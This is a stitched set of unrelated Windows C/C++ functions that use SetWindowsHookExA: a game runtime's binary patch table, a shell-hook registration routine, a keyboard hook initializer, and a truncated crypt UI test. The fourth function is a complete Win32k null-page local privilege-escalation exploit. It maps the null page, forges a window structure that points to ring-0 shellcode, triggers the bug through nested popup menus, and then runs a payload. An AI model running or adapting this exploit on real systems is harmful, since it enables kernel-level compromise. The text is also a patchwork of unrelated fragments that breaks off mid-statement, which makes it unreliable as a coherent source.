void TrySkipPatch() { //Check for arguments and write them in gStartupSettings ParseArgs(splitCmdArgsW(std::wstring(GetCommandLineW()))); // If we have stdin/stdout, attach to the IPC server ipcServer.AttachStdinStdout(); if (gStartupSettings.patch){ PATCH(0x8BECF2).NOP_PAD_TO_SIZE<0x1B5>().Apply(); //nop out the loader code *(WORD*)(0xB25046) = -1; //set run to true PATCH(0x8BED00).CALL(&InitHook).Apply(); } // Init freeimage: gFreeImgInit.init(); // Insert callback for patching which must occur after the runtime has started // (0x8BEC61 is not quite as early as would be ideal for this, but it's convenient) PATCH(0x8BEC61).CALL(&LatePatch).Apply(); //Load graphics from the HardcodedGraphicsManager HardcodedGraphicsManager::loadGraphics(); // Either in root or in config folder. The config folder is recommended however. gGeneralConfig.setFilename(getLatestConfigFile(L"luna.ini")); gGeneralConfig.loadOrDefault(); //game.ini reader GameConfiguration::runPatchByIni(INIReader(WStr2Str(getLatestConfigFile(L"game.ini")))); /************************************************************************/ /* Simple ASM Source Patches */ /************************************************************************/ fixup_TypeMismatch13(); fixup_Credits(); fixup_Mushbug(); fixup_Veggibug(); fixup_NativeFuncs(); fixup_BGODepletion(); /************************************************************************/ /* Replaced Imports */ /************************************************************************/ IMP_vbaStrCmp = &replacement_VbaStrCmp; /************************************************************************/ /* Set Hook */ /************************************************************************/ HookWnd = SetWindowsHookExA(WH_CALLWNDPROC, MsgHOOKProc, (HINSTANCE)NULL, GetCurrentThreadId()); if (!HookWnd){ DWORD errCode = GetLastError(); std::string errCmd = "Failed to Hook"; errCmd += "\nErr-Code: "; errCmd += std::to_string((long long)errCode); MessageBoxA(NULL, errCmd.c_str(), "Failed to Hook", NULL); } KeyHookWnd = SetWindowsHookExA(WH_KEYBOARD, KeyHOOKProc, (HINSTANCE)NULL, GetCurrentThreadId()); if (!KeyHookWnd){ DWORD errCode = GetLastError(); std::string errCmd = "Failed to Hook"; errCmd += "\nErr-Code: "; errCmd += std::to_string((long long)errCode); MessageBoxA(NULL, errCmd.c_str(), "Failed to Hook", NULL); } /************************************************************************/ /* Source Code Function Patch */ /************************************************************************/ PATCH(0x8D9446) .CALL(&OnLvlLoad) .NOP() .NOP() .Apply(); PATCH(0x8CA23B) .CALL(&TestFunc) .NOP() .Apply(); PATCH(0x92EC24) .CALL(&LevelHUDHook) .Apply(); *(void**)0xB2F244 = (void*)&mciSendStringHookA; PATCH(0x8D6BB6).CALL(&forceTermination).Apply(); PATCH(0x8C11D5).CALL(&LoadWorld).Apply(); PATCH(0x8C16F7).CALL(&WorldLoop).Apply(); PATCH(0x8C0E6D).CALL(&LoadIntro).Apply(); PATCH(0x932353).CALL(&printLunaLuaVersion).Apply(); PATCH(0x9090F5).CALL(&WorldRender).Apply(); PATCH(0x9204E5).CALL(&NPCKillHook).Apply(); PATCH(0x9B4E35).CALL(&NPCKillHook).Apply(); PATCH(0xA0664E).CALL(&NPCKillHook).Apply(); PATCH(0xA23278).CALL(&NPCKillHook).Apply(); PATCH(0xAA4352) .CALL(&__vbaStrCmp_TriggerSMBXEventHook) .NOP() .Apply(); PATCH(0x8C23CB) .CALL(&checkLevelShutdown) .NOP() .NOP() .Apply(); PATCH(0xA755D2).CALL(&UpdateInputHook_Wrapper).Apply(); PATCH(0x902D3D).CALL(&WorldOverlayHUDBitBltHook).Apply(); PATCH(0x902DFC).CALL(&WorldOverlayHUDBitBltHook).Apply(); PATCH(0x902EBB).CALL(&WorldOverlayHUDBitBltHook).Apply(); PATCH(0x902F80).CALL(&WorldOverlayHUDBitBltHook).Apply(); PATCH(0x908995).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x9087A8).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x9085BB).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x9083CE).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x908115).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x907F28).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x907D3B).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x907B4E).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x9077FD).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x907537).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x9072B2).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x90702D).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x906DB2).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x9055CE).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x905304).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x9051A7).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x905055).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x904F24).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x908995).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x904D4F).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x9062E0).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x906183).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x906031).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x905F00).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x905D29).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x905990).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x9065DE).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x906973).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x90499A).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x9046D0).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x904573).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x904421).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x9042F0).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x90411B).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x906B31).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x903D66).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x9063FF).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x903A9C).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x90393F).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x9037ED).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x9036BC).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x9034E7).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x9032E9).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x90323D).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x90319F).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x9030F2).CALL(&WorldIconsHUDBitBltHook).Apply(); PATCH(0x9000B2).CALL(&WorldHUDIsOnCameraHook).Apply(); PATCH(0x900235).CALL(&WorldHUDIsOnCameraHook).Apply(); PATCH(0x9004B7).CALL(&WorldHUDIsOnCameraHook).Apply(); PATCH(0x90068F).CALL(&WorldHUDIsOnCameraHook).Apply(); PATCH(0x901439).CALL(&WorldHUDPrintTextController).Apply(); PATCH(0x90266A).CALL(&WorldHUDPrintTextController).Apply(); PATCH(0x907611).CALL(&WorldHUDPrintTextController).Apply(); PATCH(0x9081E7).CALL(&WorldHUDPrintTextController).Apply(); PATCH(0x908B03).CALL(&WorldHUDPrintTextController).Apply(); PATCH(0x908A67).CALL(&WorldHUDPrintTextController).Apply(); PATCH(0x909217).CALL(&GenerateScreenshotHook).Apply(); PATCH(0x94D5E7).CALL(&GenerateScreenshotHook).Apply(); PATCH(0x8C03DC).CALL(&InitLevelEnvironmentHook).Apply(); PATCH(0x8C0A1A).CALL(&InitLevelEnvironmentHook).Apply(); PATCH(0x8C1383).CALL(&InitLevelEnvironmentHook).Apply(); PATCH(0x8C1953).CALL(&InitLevelEnvironmentHook).Apply(); PATCH(0x8CE292).CALL(&InitLevelEnvironmentHook).Apply(); PATCH(0x8E61BD).CALL(&InitLevelEnvironmentHook).Apply(); PATCH(0x8FE8D4).CALL(&InitLevelEnvironmentHook).Apply(); PATCH(0x987E94).CALL(&InitLevelEnvironmentHook).Apply(); PATCH(0x9B7B2C).CALL(&InitLevelEnvironmentHook).Apply(); PATCH(0xA02AD3).CALL(&InitLevelEnvironmentHook).Apply(); // Graphics Bitblt hooks PATCH(0x8C137E).CALL(&LoadLocalGfxHook).Apply(); PATCH(0x8D8BF1).CALL(&LoadLocalGfxHook).Apply(); PATCH(0x8D9611).CALL(&LoadLocalGfxHook).Apply(); PATCH(0x8DF52B).CALL(&LoadLocalGfxHook).Apply(); PATCH(0x8DFF7C).CALL(&LoadLocalGfxHook).Apply(); PATCH(0x8DEF73).CALL(&LoadLocalOverworldGfxHook).Apply(); PATCH(0x8DF808).CALL(&LoadLocalOverworldGfxHook).Apply(); //PATCH(0x4242D0).JMP(GET_RETADDR_TRACE_HOOK<&BitBltTraceHook>()).Apply(); PATCH(0x4242D0).JMP(&BitBltHook).Apply(); PATCH(0x424314).JMP(&StretchBltHook).Apply(); PATCH(0x8E54EC) .CALL(&MessageBoxOpenHook) .NOP() .Apply(); // Okay redigit, I know your debug values are in general pretty dumb, but right now they are awesome for easy patching! Thx mate! PATCH(0x90C856) .CALL(&CameraUpdateHook_Wrapper) .NOP() .NOP() .Apply(); // Hook to fix 100% CPU when window is inactive PATCH(0x8E6FE1) .NOP() .CALL(&WindowInactiveHook) .Apply(); // PATCH(0x96CC61).TRACE_CALL<&HardcodedGraphicsBitBltHook>().Apply(); // Don't trust QPC as much on WinXP void* frameTimingHookPtr; void* frameTimingMaxFPSHookPtr; if (gIsWindowsVistaOrNewer) { frameTimingHookPtr = (void*)&FrameTimingHookQPC; frameTimingMaxFPSHookPtr = (void*)&FrameTimingMaxFPSHookQPC; } else { frameTimingHookPtr = (void*)&FrameTimingHook; frameTimingMaxFPSHookPtr = (void*)&FrameTimingMaxFPSHook; } // Hooks to fix 100% CPU during operation // These ones are normally not sensitive to the "max FPS" setting PATCH(0x8BFD4A).SAFE_CALL(frameTimingHookPtr).NOP_PAD_TO_SIZE<0x40>().Apply(); PATCH(0x8C0488).SAFE_CALL(frameTimingHookPtr).NOP_PAD_TO_SIZE<0x40>().Apply(); PATCH(0x8C0EE6).SAFE_CALL(frameTimingHookPtr).NOP_PAD_TO_SIZE<0x40>().Apply(); // These ones are normally sensitive to the "max FPS" setting PATCH(0x8C15A7).SAFE_CALL(frameTimingMaxFPSHookPtr).NOP_PAD_TO_SIZE<0x4A>().Apply(); PATCH(0x8C20FC).SAFE_CALL(frameTimingMaxFPSHookPtr).NOP_PAD_TO_SIZE<0x4A>().Apply(); PATCH(0x8E2AED).SAFE_CALL(frameTimingMaxFPSHookPtr).NOP_PAD_TO_SIZE<0x4A>().Apply(); PATCH(0x8E56ED).SAFE_CALL(frameTimingMaxFPSHookPtr).NOP_PAD_TO_SIZE<0x4A>().Apply(); // Logging for NPC collisions //PATCH(0xA281B0).JMP(GET_RETADDR_TRACE_HOOK<&collideNPCLoggingHook>()).NOP().Apply(); // Level and world render hooks PATCH(0x909290).JMP(RenderLevelHook).NOP().Apply(); PATCH(0x8FEB10).JMP(RenderWorldHook).NOP().Apply(); // Level rendering layering hooks //PATCH(0x90C856).NOP().NOP().CALL(GetRenderBelowPriorityHook<-95>()).Apply(); //-100: Level Background PATCH(0x90F4FA).NOP().NOP().CALL(GetRenderBelowPriorityHook<-95>()).Apply(); // -95: Furthest back BGOs PATCH(0x910433).NOP().NOP().CALL(GetRenderBelowPriorityHook<-90>()).Apply(); // -90: Sizable Blocks PATCH(0x910E5D).NOP().NOP().CALL(GetRenderBelowPriorityHook<-85>()).Apply(); // -85: Some more BGOs PATCH(0x911F19).NOP().NOP().CALL(GetRenderBelowPriorityHook<-80>()).Apply(); // -80: Warp - Derived BGOs (locks on doors and stuff) PATCH(0x912748).NOP().NOP().CALL(GetRenderBelowPriorityHook<-75>()).Apply(); // -75: Background NPCs (vines, piranah plants, diggable sand, mother brain, things in MB jars) PATCH(0x915316).NOP().NOP().CALL(GetRenderBelowPriorityHook<-70>()).Apply(); // -70: Held NPCs PATCH(0x91D422).NOP().NOP().CALL(GetRenderBelowPriorityHook<-65>()).Apply(); // -65: Normal Blocks PATCH(0x91DD44).NOP().NOP().CALL(GetRenderBelowPriorityHook<-60>()).Apply(); // -60: Furthest Back Effects (doors, pressed p-switches, some other stuff) PATCH(0x91E1F2).NOP().NOP().CALL(GetRenderBelowPriorityHook<-55>()).Apply(); // -55: Some NPCs (i.e. coins, clown car, chompy, herb, wood rocket, koopaling fire) PATCH(0x91F802).NOP().NOP().CALL(GetRenderBelowPriorityHook<-50>()).Apply(); // -50: Some NPCs (ice blocks) PATCH(0x920040).NOP().NOP().CALL(GetRenderBelowPriorityHook<-45>()).Apply(); // -45: Normal NPCs PATCH(0x922D00).NOP().NOP().CALL(GetRenderBelowPriorityHook<-40>()).Apply(); // -40: Symbol above NPCs that want to chat (hardcoded-43/44) PATCH(0x923786).NOP().NOP().CALL(GetRenderBelowPriorityHook<-35>()).Apply(); // -35: Player Mounts PATCH(0x927F21).NOP().NOP().CALL(GetRenderBelowPriorityHook<-30>()).Apply(); // -30: Something else player mount related? PATCH(0x928EA5).NOP().NOP().CALL(GetRenderBelowPriorityHook<-25>()).Apply(); // -25: Players PATCH(0x928F0A).NOP().NOP().CALL(GetRenderBelowPriorityHook<-20>()).Apply(); // -20: Foreground BGOs PATCH(0x929F81).NOP().NOP().CALL(GetRenderBelowPriorityHook<-15>()).Apply(); // -15: Foreground NPCs PATCH(0x92B428).NOP().NOP().CALL(GetRenderBelowPriorityHook<-10>()).Apply(); // -10: Foreground Blocks PATCH(0x92BAC0).NOP().NOP().CALL(GetRenderBelowPriorityHook<-5>()).Apply(); // -5: Foreground Effects (all not at 0091DD90) // Handle Priority 5 from LevelHUDHook // 5: HUD PATCH(0x939977).NOP().NOP().CALL(GetRenderBelowPriorityHook<100>()).Apply(); // Change Mode Hook // Runs when the game starts or the game mode changes. PATCH(0x8BF4E3).CALL(runtimeHookSmbxChangeModeHookRaw).NOP_PAD_TO_SIZE<10>().Apply(); // Load level hook PATCH(0x8D8F40).JMP(runtimeHookLoadLevel).NOP_PAD_TO_SIZE<6>().Apply(); // Close window hook PATCH(0x8BE3DA).CALL(runtimeHookCloseWindow).Apply(); // Anti-Fullscreen hook PATCH(0x95429A).CALL(runtimeHookChangeResolution).Apply(); PATCH(0xA98142).CALL(runtimeHookChangeResolution).Apply(); PATCH(0xA98166).CALL(runtimeHookChangeResolution).Apply(); PATCH(0x96ADD7).CALL(runtimeHookSmbxCheckWindowedRaw).NOP_PAD_TO_SIZE<8>().Apply(); PATCH(0x9DB1D8).JMP(runtimeHookBlockBumpableRaw).NOP_PAD_TO_SIZE<6>().Apply(); PATCH(0xA28FE3).JMP(runtimeHookNPCVulnerabilityRaw).Apply(); PATCH(0x9A9D33).JMP(runtimeHookNPCSpinjumpSafeRaw).NOP_PAD_TO_SIZE<10>().Apply(); PATCH(0xA75079).JMP(runtimeHookCheckInputRaw).NOP_PAD_TO_SIZE<7>().Apply(); /************************************************************************/ /* Import Table Patch */ /************************************************************************/ __vbaR4Var = (float(*)(VARIANTARG*))0x00401124; *(void**)0x00401124 = (void*)&vbaR4VarHook; rtcMsgBox = (int(__stdcall *)(VARIANTARG*, DWORD, DWORD, DWORD, DWORD))(*(void**)0x004010A8); *(void**)0x004010A8 = (void*)&rtcMsgBoxHook; }
/************************************************************************* * RegisterShellHook [SHELL.102] */ BOOL WINAPI RegisterShellHook16(HWND16 hWnd, UINT16 uAction) { TRACE("%04x [%u]\n", hWnd, uAction ); switch( uAction ) { case 2: /* register hWnd as a shell window */ if( !SHELL_hHook ) { SHELL_hHook = SetWindowsHookExA( WH_SHELL, SHELL_HookProc, GetModuleHandleA("shell32.dll"), 0 ); if ( SHELL_hHook ) { uMsgWndCreated = RegisterWindowMessageA( lpstrMsgWndCreated ); uMsgWndDestroyed = RegisterWindowMessageA( lpstrMsgWndDestroyed ); uMsgShellActivate = RegisterWindowMessageA( lpstrMsgShellActivate ); } else WARN("-- unable to install ShellHookProc()!\n"); } if ( SHELL_hHook ) return ((SHELL_hWnd = HWND_32(hWnd)) != 0); break; default: WARN("-- unknown code %i\n", uAction ); SHELL_hWnd = 0; /* just in case */ } return FALSE; }
bool initializeKeyhook() { std::thread([=](){ if (g_hook != nullptr) { if (g_keyboardHookedCallback) g_keyboardHookedCallback(false); return; } g_hook = SetWindowsHookExA(WH_KEYBOARD_LL, lowLevelKeyboardProc, GetModuleHandle(0), 0); if (g_keyboardHookedCallback) g_keyboardHookedCallback(g_hook != nullptr); MSG msg; while (GetMessageA(&msg, NULL, 0, 0)) { TranslateMessage(&msg); DispatchMessage(&msg); } }).detach(); return true; }
void Win32kNullPage(LPVOID lpPayload) { HWND hWnd; WNDCLASSA WndClass; LPBYTE promise_land = NULL; HMODULE hNtdll = NULL; HMODULE ntkrnl = NULL; NTSTATUS status; PULONG pSystemInfoBuffer = NULL; lZwQuerySystemInformation pZwQuerySystemInformation = NULL; ULONG SystemInfoBufferSize = 0; char nt_name[256]; PVOID nt_base; OSVERSIONINFOA VersionInformation; // Getting Windows version LogMessage("[*] Getting Windows version..."); memset(&VersionInformation, 0, sizeof(OSVERSIONINFOA)); VersionInformation.dwOSVersionInfoSize = 148; if (!GetVersionExA(&VersionInformation)) { LogMessage("[!] Failed to get windows version"); return; } #ifdef _M_X64 if (VersionInformation.dwMajorVersion == 6 && VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows 7 SP1 LogMessage("[*] Windows 6.1 found..."); OffsetWindows = 0x208; } #else if (VersionInformation.dwMajorVersion == 6) { if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows 7 SP1 LogMessage("[*] Windows 6.1 found..."); OffsetWindows = 0xf8; } else if (!VersionInformation.dwMinorVersion) { LogMessage("[*] Windows 6.0 found..."); // Ex: Windows 2008 R2 OffsetWindows = 0xe0; } else { LogMessage("[!] Unsupported Windows 6.%d found, only 6.0 and 6.1 supported atm", VersionInformation.dwMinorVersion); return; } } else if (VersionInformation.dwMajorVersion == 5) { if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows XP SP3 LogMessage("[*] Windows 5.1 found..."); OffsetWindows = 0xc8; } else if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 2) { // Ex: Windows 2003 SP2 LogMessage("[*] Windows 5.2 found..."); OffsetWindows = 0xd8; } else { LogMessage("[!] Unsupported Windows 5 found, only 5.1 and 5.2 supported atm"); return; } } #endif else { LogMessage("[!] Major Version %d found, not supported", VersionInformation.dwMajorVersion); return; } // Solve symbols LogMessage("[*] Solving symbols..."); hNtdll = LoadLibraryA("ntdll"); if (hNtdll == NULL) { LogMessage("[!] Failed to Load ntdll..."); return; } pZwQuerySystemInformation = (lZwQuerySystemInformation)GetProcAddress(hNtdll, "ZwQuerySystemInformation"); if (pZwQuerySystemInformation == NULL) { LogMessage("[!] Failed to solve ZwQuerySystemInformation"); return; } pNtAllocateVirtualMemory = (lNtAllocateVirtualMemory)GetProcAddress(hNtdll, "NtAllocateVirtualMemory"); if (pNtAllocateVirtualMemory == NULL) { LogMessage("[!] Failed to solve NtAllocateVirtualMemory"); return; } LogMessage("[*] Requesting Kernel loaded modules..."); status = pZwQuerySystemInformation(11, &SystemInfoBufferSize, 0, &SystemInfoBufferSize); if (SystemInfoBufferSize == 0) { LogMessage("[!] Requesting pZwQuerySystemInformation required length failed"); return; } else { LogMessage("[*] pZwQuerySystemInformation required length %d", SystemInfoBufferSize); } pSystemInfoBuffer = (PULONG)LocalAlloc(LMEM_ZEROINIT, SystemInfoBufferSize); if (pSystemInfoBuffer == NULL) { LogMessage("[!] Allocation for SystemInfo failed"); return; } status = pZwQuerySystemInformation(11, pSystemInfoBuffer, SystemInfoBufferSize, &SystemInfoBufferSize); if (status != STATUS_SUCCESS) { LogMessage("[!] Requesting kernel modules through ZwQuerySystemInformation failed"); return; } LogMessage("[*] Parsing SYSTEM_INFO..."); SYSTEM_MODULE_INFORMATION *smi = (SYSTEM_MODULE_INFORMATION *)pSystemInfoBuffer; LogMessage("[*] %d Kernel modules found\n", smi->ModulesCount); memset(nt_name, 0, 256); int i = 0; while (i < smi->ModulesCount) { SYSTEM_MODULE *sm = (SYSTEM_MODULE *)(smi->Modules + i); LogMessage("[*] Checking module %s", sm->Name); if (strstr((char *)sm->Name, ".exe")) { char *start = strstr((char *)sm->Name, "nt"); if (start != NULL) { nt_base = sm->ImageBaseAddress; strncpy_s(nt_name, 256, start, _TRUNCATE); break; } } i++; } if (nt_name == NULL) { LogMessage("[!] nt not found"); return; } else { LogMessage("[*] Good! nt found as %s at 0x%08x", nt_name, nt_base); } ntkrnl = LoadLibraryA(nt_name); LogMessage("[*] %s loaded in userspace at: %08x\n", nt_name, ntkrnl); pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)GetProcAddress(ntkrnl, "PsLookupProcessByProcessId"); if (pPsLookupProcessByProcessId == NULL) { LogMessage("[!] Failed to solve PsLookupProcessByProcessId\n"); return; } #ifdef _M_X64 pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((QWORD)nt_base + ((QWORD)pPsLookupProcessByProcessId - (QWORD)ntkrnl)); LogMessage("[*] pPsLookupProcessByProcessId in kernel: %016llx\n", pPsLookupProcessByProcessId); #else pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((DWORD)nt_base + ((DWORD)pPsLookupProcessByProcessId - (DWORD)ntkrnl)); LogMessage("[*] pPsLookupProcessByProcessId in kernel: %08x\n", pPsLookupProcessByProcessId); #endif MyProcessId = GetCurrentProcessId(); // Register Class LogMessage("[*] Registering class..."); memset(&WndClass, 0, sizeof(WNDCLASSA)); WndClass.lpfnWndProc = WndProc; // Called with CallWindowProc => http://msdn.microsoft.com/en-us/library/windows/desktop/ms633571(v=vs.85).aspx WndClass.lpszClassName = "woqunimalegebi"; if (RegisterClassA(&WndClass) == 0) { LogMessage("[!] RegisterClassA failed "); return; } // Create Window LogMessage("[*] Creating window..."); hWnd = CreateWindowExA(0, "woqunimalegebi", NULL, 0, -1, -1, 0, 0, NULL, NULL, NULL, NULL); if (hWnd == NULL) { LogMessage("[!] CreateWindowExA failed"); return; } // Making everything ready for exploitation... LogMessage("[*] Allocating null page..."); #ifdef _M_X64 ULONGLONG base_address = 0x00000000fffffffb; #else DWORD base_address = 1; #endif SIZE_T region_size = 0x1000; ULONG zero_bits = 0; HANDLE current_process = NULL; current_process = GetCurrentProcess(); if (pNtAllocateVirtualMemory(current_process, (LPVOID*)(&base_address), 0, ®ion_size, (MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN), PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS) { LogMessage("[!] Failed to allocate null page"); return; } LogMessage("[*] Getting PtiCurrent..."); #ifdef _M_X64 ULONGLONG pti = MyPtiCurrent(); #else DWORD pti = MyPtiCurrent(); #endif if (pti == 0) { LoadLibrary("user32.dll"); LoadLibrary("gdi32.dll"); pti = MyPtiCurrent(); } if (pti == 0) { LogMessage("[!] Filed to get PtiCurrent"); return; } else { #ifdef _M_X64 LogMessage("[*] Good! pti 0x%016llx", pti); #else LogMessage("[*] Good! pti 0x%08x", pti); #endif } LogMessage("[*] Creating a fake structure at NULL..."); #ifdef _M_X64 void *test = NULL; (QWORD)test = 0x10000000B; *((PQWORD)test) = pti; /* win32k!tagWND->bServerSideWindowProc = TRUE */ (QWORD)test = 0x100000025; *((PBYTE)test) = 4; /* win32k!tagWND->lpfnWndProc = &shellcode_ring0 */ (QWORD)test = 0x10000008B; *((PQWORD)test) = &shellcode_ring0; #else void *test = promise_land + 3; /* We need to save this check, otherwise unmapped memory will be dereferenced (blue screen) .text:BF8B93F4 02C mov edi, _gptiCurrent .text:BF8B93FA 02C cmp edi, [esi + 8]; .text:BF8B93FD 02C jz loc_BF8B */ *(LPDWORD)test = pti; *((LPBYTE)(promise_land + 0x11)) = 0x4; test = promise_land + 0x5b; *(LPDWORD)test = (DWORD)shellcode_ring0; #endif // Exploit! LogMessage("[*] Triggering vulnerability..."); HMENU MenuOne = CreatePopupMenu(); if (MenuOne == NULL) { LogMessage("[!] First CreatePopupMenu failed"); return; } MENUITEMINFOA MenuOneInfo; memset(&MenuOneInfo, 0, sizeof(MENUITEMINFOA)); MenuOneInfo.cbSize = sizeof(MENUITEMINFOA); MenuOneInfo.fMask = MIIM_STRING; if (InsertMenuItemA(MenuOne, 0, TRUE, &MenuOneInfo) != TRUE) { LogMessage("[!] First InsertMenuItemA failed"); DestroyMenu(MenuOne); return; } HMENU MenuTwo = CreatePopupMenu(); if (MenuTwo == NULL) { LogMessage("[!] Second CreatePopupMenu failed"); DestroyMenu(MenuOne); return; } MENUITEMINFOA MenuTwoInfo; memset(&MenuTwoInfo, 0, sizeof(MENUITEMINFOA)); MenuTwoInfo.cbSize = sizeof(MENUITEMINFOA); MenuTwoInfo.fMask = (MIIM_STRING | MIIM_SUBMENU); MenuTwoInfo.dwTypeData = ""; MenuTwoInfo.cch = 1; MenuTwoInfo.hSubMenu = MenuOne; if (InsertMenuItemA(MenuTwo, 0, TRUE, &MenuTwoInfo) != TRUE) { LogMessage("[!] Second InsertMenuItemA failed"); DestroyMenu(MenuTwo); DestroyMenu(MenuOne); return; } if (SetWindowsHookExA(WH_CALLWNDPROC, HookCallback, NULL, GetCurrentThreadId()) == NULL) { LogMessage("[!] SetWindowsHookExA failed :-(\n"); DestroyMenu(MenuTwo); DestroyMenu(MenuOne); return; } // 'crash' it! TrackPopupMenu(MenuTwo, 0, -10000, -10000, 0, hWnd, NULL); // If everything worked process should be privileges at this point LogMessage("[!] Executing payload..."); CreateThread(0, 0, ExecutePayload, lpPayload, 0, NULL); return; }
static void test_crypt_ui_wiz_import(void) { BOOL ret; CRYPTUI_WIZ_IMPORT_SRC_INFO info; HCERTSTORE store; PCCERT_CONTEXT cert; PCCRL_CONTEXT crl; DWORD count; if (!pCryptUIWizImport) { skip("No CryptUIWizImport\n"); return; } /* Set CBT hook to disallow MessageBox and wizard creation in current * thread. */ hook = SetWindowsHookExA(WH_CBT, cbt_hook_proc, 0, GetCurrentThreadId()); /* Brings up UI. Cancelling yields ret = 1. */ if (0) { pCryptUIWizImport(0, 0, NULL, NULL, NULL); } SetLastError(0xdeadbeef); ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI, 0, NULL, NULL, NULL); ok(!ret && GetLastError() == E_INVALIDARG, "expected E_INVALIDARG, got %08x\n", GetLastError()); memset(&info, 0, sizeof(info)); SetLastError(0xdeadbeef); ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI, 0, NULL, &info, NULL); ok(!ret && GetLastError() == E_INVALIDARG, "expected E_INVALIDARG, got %08x\n", GetLastError()); info.dwSize = sizeof(info); SetLastError(0xdeadbeef); ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI, 0, NULL, &info, NULL); ok(!ret && GetLastError() == E_INVALIDARG, "expected E_INVALIDARG, got %08x\n", GetLastError()); info.dwSubjectChoice = CRYPTUI_WIZ_IMPORT_SUBJECT_CERT_CONTEXT; SetLastError(0xdeadbeef); ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI, 0, NULL, &info, NULL); ok(!ret && GetLastError() == E_INVALIDARG, "expected E_INVALIDARG, got %08x\n", GetLastError()); SetLastError(0xdeadbeef); ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI | CRYPTUI_WIZ_IMPORT_ALLOW_CERT, 0, NULL, &info, NULL); ok(!ret && GetLastError() == E_INVALIDARG, "expected E_INVALIDARG, got %08x\n", GetLastError()); /* Check allowed vs. given type mismatches */ info.u.pCertContext = CertCreateCertificateContext(X509_ASN_ENCODING, v1CertWithValidPubKey, sizeof(v1CertWithValidPubKey)); SetLastError(0xdeadbeef); ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI | CRYPTUI_WIZ_IMPORT_ALLOW_CRL, 0, NULL, &info, NULL); ok(!ret && GetLastError() == E_INVALIDARG, "expected E_INVALIDARG, got %08x\n", GetLastError()); CertFreeCertificateContext(info.u.pCertContext); info.dwSubjectChoice = CRYPTUI_WIZ_IMPORT_SUBJECT_CRL_CONTEXT; info.u.pCRLContext = CertCreateCRLContext(X509_ASN_ENCODING, signedCRL, sizeof(signedCRL)); SetLastError(0xdeadbeef); ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI | CRYPTUI_WIZ_IMPORT_ALLOW_CERT, 0, NULL, &info, NULL); ok(!ret && GetLastError() == E_INVALIDARG, "expected E_INVALIDARG, got %08x\n", GetLastError()); CertFreeCRLContext(info.u.pCRLContext); /* Imports the following cert--self-signed, with no basic constraints set-- * to the CA store. Puts up a dialog at the end if it succeeds or fails. */ info.dwSubjectChoice = CRYPTUI_WIZ_IMPORT_SUBJECT_CERT_CONTEXT; info.u.pCertContext = CertCreateCertificateContext(X509_ASN_ENCODING, v1CertWithValidPubKey, sizeof(v1CertWithValidPubKey)); ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI, 0, NULL, &info, NULL); ok(ret, "CryptUIWizImport failed: %08x\n", GetLastError()); if (ret) { static const WCHAR CA[] = { 'C','A',0 }; HCERTSTORE ca = CertOpenStore(CERT_STORE_PROV_SYSTEM_W, 0, 0, CERT_SYSTEM_STORE_CURRENT_USER, CA); if (ca) { ret = 